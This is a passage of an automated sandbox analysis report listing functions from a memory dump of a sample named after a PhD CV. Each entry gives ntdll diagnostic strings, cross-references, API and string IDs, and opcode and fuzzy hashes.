                                                                                                  • Instruction Fuzzy Hash: 1BA1B332D0022ADBCB64DF54DC84B99B3B1BF58324F2441EAD908A7251D731DE85EF92
                                                                                                  Function 00F749F0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FB3241
                                                                                                  • RtlDeactivateActivationContext, xrefs: 00FB322F, 00FB323C, 00FB325B
                                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FB3260
                                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FB3234
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                  • API String ID: 0-1245972979
                                                                                                  • Opcode ID: 7786fdea0f0c61a476a7cfdbc6fe120cd0b911172f02a85941a4ec4dc804e5c4
                                                                                                  • Instruction ID: 2b12a0e6e2bd6218dcfd3d2e6612bbd7994a9ce2c1f6c0b239246de5bbc1be37
                                                                                                  • Opcode Fuzzy Hash: 7786fdea0f0c61a476a7cfdbc6fe120cd0b911172f02a85941a4ec4dc804e5c4
                                                                                                  • Instruction Fuzzy Hash: 9C611732A847119FD721CF19CC82B66B3A5EF84B60F15852EF8599B290C734FD01EB96
                                                                                                  Function 00F463CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FA0E72
                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FA0EB5
                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FA0E2F
                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FA0DEC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                  • API String ID: 0-1468400865
                                                                                                  • Opcode ID: 4b52155fccd3628ae165cd94ae71e3c05799ba8855db2921e456397e3a8c2556
                                                                                                  • Instruction ID: 9a30ec984d812abfe2660776cee6f89814d8f66ff7353cf615698e75788ee040
                                                                                                  • Opcode Fuzzy Hash: 4b52155fccd3628ae165cd94ae71e3c05799ba8855db2921e456397e3a8c2556
                                                                                                  • Instruction Fuzzy Hash: 6571D2B19043049FCB60EF10C885B977FA8AF86764F500469FD488B157D738D589EBD2
                                                                                                  Function 00F74C3D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 00FB344A, 00FB3476
                                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 00FB3466
                                                                                                  • LdrpFindDllActivationContext, xrefs: 00FB3440, 00FB346C
                                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00FB3439
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                  • API String ID: 0-3779518884
                                                                                                  • Opcode ID: d66b38c33710756c00f930aa326476d91912b303c19691abb65500c226ebdce3
                                                                                                  • Instruction ID: 892ae4b5b540b08ab1cdee92923bbf38eeaa4672ef84b811414e27004dfa5a5e
                                                                                                  • Opcode Fuzzy Hash: d66b38c33710756c00f930aa326476d91912b303c19691abb65500c226ebdce3
                                                                                                  • Instruction Fuzzy Hash: 0A312B72F42221AFDB339B048845F65B2A8BB15374F0AC12BD44857190D7A5BD80F793
                                                                                                  Function 00F6237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FAA79F
                                                                                                  • LdrpDynamicShimModule, xrefs: 00FAA7A5
                                                                                                  • apphelp.dll, xrefs: 00F62382
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FAA7AF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-176724104
                                                                                                  • Opcode ID: 82506148ce9921789094690824d595f55be5fae50172adf1fec848193ba4203e
                                                                                                  • Instruction ID: 5d8ec1da86fa1127acb68ee9328656e24fde24e210e3006d7441059e3d754a42
                                                                                                  • Opcode Fuzzy Hash: 82506148ce9921789094690824d595f55be5fae50172adf1fec848193ba4203e
                                                                                                  • Instruction Fuzzy Hash: 50312AB2E00201EBDB309F19D886A6A77B8FB85B10F14001DE841AB295D77E9D45EB51
                                                                                                  Function 00F50680 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-4253913091
                                                                                                  • Opcode ID: fcf5bc25ff90cfb13615220168d385a9af5c10584df9ce291c41ec9dc3d33ee7
                                                                                                  • Instruction ID: 3c627339facb840e92977914cc6103921b6d0ff7dceb6195da181bd1849f8683
                                                                                                  • Opcode Fuzzy Hash: fcf5bc25ff90cfb13615220168d385a9af5c10584df9ce291c41ec9dc3d33ee7
                                                                                                  • Instruction Fuzzy Hash: 9AF1DD71A00606DFDB14CF68C884F6AB7B5FF85711F248168EA169B381DB34ED85EB90
                                                                                                  Function 00F66882 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $@
                                                                                                  • API String ID: 0-1077428164
                                                                                                  • Opcode ID: 5193a5ecd5d4e93c1e2b0f6617ab4025809be89a8a771dfb295fbcc30ed22feb
                                                                                                  • Instruction ID: ec21bc0af23e02798e0712ff33e74cce0e4eced63582023ad42e6e1231b816e4
                                                                                                  • Opcode Fuzzy Hash: 5193a5ecd5d4e93c1e2b0f6617ab4025809be89a8a771dfb295fbcc30ed22feb
                                                                                                  • Instruction Fuzzy Hash: B2C29D72A0C3419FD724DF24C881BABBBE5AF89758F14892DF989C7241D734D805EB92
                                                                                                  Function 00F3A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                  • API String ID: 0-2779062949
                                                                                                  • Opcode ID: 327af440e561d74872d9d4bd3b2d404aa8fd9d954de15f39410233fb9079072d
                                                                                                  • Instruction ID: e4a582bfeee4b43d16e770c6cb4b7be8f1d28ef0772781489a58bfbb8934f29b
                                                                                                  • Opcode Fuzzy Hash: 327af440e561d74872d9d4bd3b2d404aa8fd9d954de15f39410233fb9079072d
                                                                                                  • Instruction Fuzzy Hash: DBA15D719016299BDF31AB64CC89BEAB7B8EF44710F1001EAE909A7251D735AEC4DF90
                                                                                                  Function 00F60AEB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 00FA9F1C
                                                                                                  • LdrpCheckModule, xrefs: 00FA9F24
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FA9F2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-161242083
                                                                                                  • Opcode ID: 57a1370ad7553bea11e5fbe318bd8404195f73dea061201fc2eab9a686773f3b
                                                                                                  • Instruction ID: df91adf49b01f5b80f688821ec549bfae645fa465644126327ab9c0d6531f50f
                                                                                                  • Opcode Fuzzy Hash: 57a1370ad7553bea11e5fbe318bd8404195f73dea061201fc2eab9a686773f3b
                                                                                                  • Instruction Fuzzy Hash: A871D4B1E002059FCB24DF68C885BBEB7F4EB84714F248469E842E7255DB799E41EB50
                                                                                                  Function 00F5096B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-1334570610
                                                                                                  • Opcode ID: b77db0e7285b714bc7b70c81350e9e4eeec674099fb1e14551993113328ad32f
                                                                                                  • Instruction ID: 979dc9b31cacc5afc1f59af6c71ed51503c025c365893c9bd075c1ca2247fcb5
                                                                                                  • Opcode Fuzzy Hash: b77db0e7285b714bc7b70c81350e9e4eeec674099fb1e14551993113328ad32f
                                                                                                  • Instruction Fuzzy Hash: 6F61EF71A007019FDB28CF24C881B66BBE1FF45714F24846EE9858F396DB34E885EB91
                                                                                                  Function 00F3CC68 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00F3CCD4
                                                                                                  • @, xrefs: 00F3CD03
                                                                                                  • InstallLanguageFallback, xrefs: 00F3CD1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                  • API String ID: 0-1757540487
                                                                                                  • Opcode ID: 578904daeb4b0074386149b8d6447e9887edfdba3f6b6eed79cd074beea192b6
                                                                                                  • Instruction ID: 1e4a845df01496f20ad31c29c965769b2b279811870bb187ec5c23a6737d3a7c
                                                                                                  • Opcode Fuzzy Hash: 578904daeb4b0074386149b8d6447e9887edfdba3f6b6eed79cd074beea192b6
                                                                                                  • Instruction Fuzzy Hash: 2E51A0769043019BDB10DF64C840BABB7E8AF88764F54092EF995E7250EB34DD44EBE2
                                                                                                  Function 00F7C640 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 00FB80E9
                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 00FB80E2
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FB80F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1783798831
                                                                                                  • Opcode ID: d88e78f0f8841525ea9710580dca10222b87ebca9fa4d79e1f608616cbc7868a
                                                                                                  • Instruction ID: 67c58d3790d4dfa618a06a64ba379ae91709f92045f91a9620a3341dfb2612ee
                                                                                                  • Opcode Fuzzy Hash: d88e78f0f8841525ea9710580dca10222b87ebca9fa4d79e1f608616cbc7868a
                                                                                                  • Instruction Fuzzy Hash: 2741E671904300ABC730EB24DC86B5B77ECEF84760F00592EB98C97251EB79D905EB92
                                                                                                  Function 00FC43D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 00FC4519
                                                                                                  • LdrpCheckRedirection, xrefs: 00FC450F
                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FC4508
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 0-3154609507
                                                                                                  • Opcode ID: dec9a9debf969ef504341ea2b7182382ee3d6aa4c23f5c2849cd21c8a3be9778
                                                                                                  • Instruction ID: d0397cd8305457c34c0a86093715d7301dbd517fb9970cd8232116ef28a2b25f
                                                                                                  • Opcode Fuzzy Hash: dec9a9debf969ef504341ea2b7182382ee3d6aa4c23f5c2849cd21c8a3be9778
                                                                                                  • Instruction Fuzzy Hash: B941F332A046129BCB29CF58CA52F6677E4BF88720B29065EFC98D7255D731FC00AB91
                                                                                                  Function 00F50ACE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-2558761708
                                                                                                  • Opcode ID: c48604657d7f961bdee64efa63c343b4b3b1a76c2a69d3047095c1b98fc5b01c
                                                                                                  • Instruction ID: 7baa63f6d1fda63d70cd0c1cc7da6ea06b1f7839a88eee114db4ef8263f688db
                                                                                                  • Opcode Fuzzy Hash: c48604657d7f961bdee64efa63c343b4b3b1a76c2a69d3047095c1b98fc5b01c
                                                                                                  • Instruction Fuzzy Hash: DF110372301A019FDB28DA24C894B36B3A9FF91B21F25402AE906CF240DB38EC44F741
                                                                                                  Function 00F4A8F0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • LdrResSearchResource Enter, xrefs: 00F4A933
                                                                                                  • LdrResSearchResource Exit, xrefs: 00F4A945
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                  • API String ID: 0-4066393604
                                                                                                  • Opcode ID: 75779ef564a418e9828fb710604e6ee361719f70c3e1c024a038c1edfd306a4c
                                                                                                  • Instruction ID: 82e965dc2a800747296c5fb700a5d210aa04935e470097df772151ed20c4ce9d
                                                                                                  • Opcode Fuzzy Hash: 75779ef564a418e9828fb710604e6ee361719f70c3e1c024a038c1edfd306a4c
                                                                                                  • Instruction Fuzzy Hash: E0E18DB2E44259DFEB21CE98C980BAEBBB9AF45324F14402AED01E7251D738DD41FB51
                                                                                                  Function 00FE2AE0 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • , xrefs: 00FE2E38
                                                                                                  • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 00FE2B91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                                  • API String ID: 0-4088147954
                                                                                                  • Opcode ID: fae01347b0a12d98a5f5ef4c57075696d7a13221a94ac3ae4824cebc9397d52b
                                                                                                  • Instruction ID: 5240fc548eb2dac013443ecea6f07e01323c7c241cabf139fc1bd7c90055d919
                                                                                                  • Opcode Fuzzy Hash: fae01347b0a12d98a5f5ef4c57075696d7a13221a94ac3ae4824cebc9397d52b
                                                                                                  • Instruction Fuzzy Hash: CCC1DF72A083819BD760CF1AC881B2FB7E9AFD8724F18491DF9849B240E774DD45E792
                                                                                                  Function 00FBE372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Legacy$UEFI
                                                                                                  • API String ID: 2994545307-634100481
                                                                                                  • Opcode ID: 49066c16c69647d9cda388867a9f2153641c743d45f6b6cd82bf46a404aa22e2
                                                                                                  • Instruction ID: 4abb54226410c415d2a2c1a1ee0758e46ec8c525e67e6ea34951b870a216a0b5
                                                                                                  • Opcode Fuzzy Hash: 49066c16c69647d9cda388867a9f2153641c743d45f6b6cd82bf46a404aa22e2
                                                                                                  • Instruction Fuzzy Hash: 26614B72E002189FDB24DFA9C840BEDBBF9FB44704F244029E549EB291E634E940EF50
                                                                                                  Function 00F4AB70 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • LdrpResGetMappingSize Enter, xrefs: 00F4AB8A
                                                                                                  • LdrpResGetMappingSize Exit, xrefs: 00F4AB9C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                                  • API String ID: 0-1497657909
                                                                                                  • Opcode ID: b7b3888a0b0bc09309f865bc30ddca53f85a85bf4c3c6d2197ec03d0b88d31b6
                                                                                                  • Instruction ID: 37e9f806b71d02283d8afe685896eb5bf7ccb72833ee80c074614ce8179dd277
                                                                                                  • Opcode Fuzzy Hash: b7b3888a0b0bc09309f865bc30ddca53f85a85bf4c3c6d2197ec03d0b88d31b6
                                                                                                  • Instruction Fuzzy Hash: DB61EF72E446488FEB51CFA8C880BAABBB5FF55714F144069ED01EB281E778D940E762
                                                                                                  Function 00F74B79 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0$Flst
                                                                                                  • API String ID: 0-758220159
                                                                                                  • Opcode ID: 35549232d0be916cdc80bd4a50ef09f6e94278e50f10f3f71ed0eadfbcc88dd6
                                                                                                  • Instruction ID: 70837ccdad2c221ecfa3f705fc81a7f4dc221fadc6b5bf65c3ee7860e6142125
                                                                                                  • Opcode Fuzzy Hash: 35549232d0be916cdc80bd4a50ef09f6e94278e50f10f3f71ed0eadfbcc88dd6
                                                                                                  • Instruction Fuzzy Hash: 40518AB1E01258CBDF26CF99C8847A9FBF4EF54724F14C02AD0499B244E774AE81DB81
                                                                                                  Function 00F40485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F40586
                                                                                                  • kLsE, xrefs: 00F405FE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                  • API String ID: 0-2547482624
                                                                                                  • Opcode ID: 42c229fe20b86c377b480726741db531c45d5052369ce251a9db6fc31ea2c2fc
                                                                                                  • Instruction ID: 0b6364676ec8f2009c15e6887e6a7cc618a55c1df93f4c93f3137326909a4bb8
                                                                                                  • Opcode Fuzzy Hash: 42c229fe20b86c377b480726741db531c45d5052369ce251a9db6fc31ea2c2fc
                                                                                                  • Instruction Fuzzy Hash: C251A172A00746DFDB24DFA4C4407AABBF4EF44310F14443EDA9697241EB749945EFA1
                                                                                                  Function 00F72DBC Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 00FB2616
                                                                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 00FB2611
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                                  • API String ID: 0-2104531740
                                                                                                  • Opcode ID: a38ed497a8ec06d3c91cb87cddecd1bbc010401c13e46965b8183124d0b12249
                                                                                                  • Instruction ID: 64125b46e84ee222ed38c78474168f397e17d6714001532c8cbc1b4fa359200e
                                                                                                  • Opcode Fuzzy Hash: a38ed497a8ec06d3c91cb87cddecd1bbc010401c13e46965b8183124d0b12249
                                                                                                  • Instruction Fuzzy Hash: 7841D572A00211EBD724DF56C891FBAB3B5FF94720F24802EE9499B240DB30DD41EB90
                                                                                                  Function 00F4A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 00F4A229
                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 00F4A21B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                  • API String ID: 0-2876891731
                                                                                                  • Opcode ID: f40dd2a301545439540ca460d643ad9e918638e03628dead125f65907ba080e5
                                                                                                  • Instruction ID: 538b5a9afc08ec94d558423805db6de37038dcd65d8ac89b7d060de71eb58880
                                                                                                  • Opcode Fuzzy Hash: f40dd2a301545439540ca460d643ad9e918638e03628dead125f65907ba080e5
                                                                                                  • Instruction Fuzzy Hash: 0141CF71B40644DBDB15CF69C840B6ABBB4EF4AB24F1440A9ED00DB2A1E375DE40FB11
                                                                                                  Function 00F7A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                  • Opcode ID: 7e0e16d9bcb7fdf7d6ace2520a26ba8a0a57cfabdd2590c824d0480929c1815a
                                                                                                  • Instruction ID: 4db5977323df1d5f312c487664bb13b4fc396d40b1da3b057ea3730a05769583
                                                                                                  • Opcode Fuzzy Hash: 7e0e16d9bcb7fdf7d6ace2520a26ba8a0a57cfabdd2590c824d0480929c1815a
                                                                                                  • Instruction Fuzzy Hash: 3901ADB2250B00AFD311DF14CD06B1677E8E784B15F05893AA55CC7590E739E900EB47
                                                                                                  Function 00F4C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
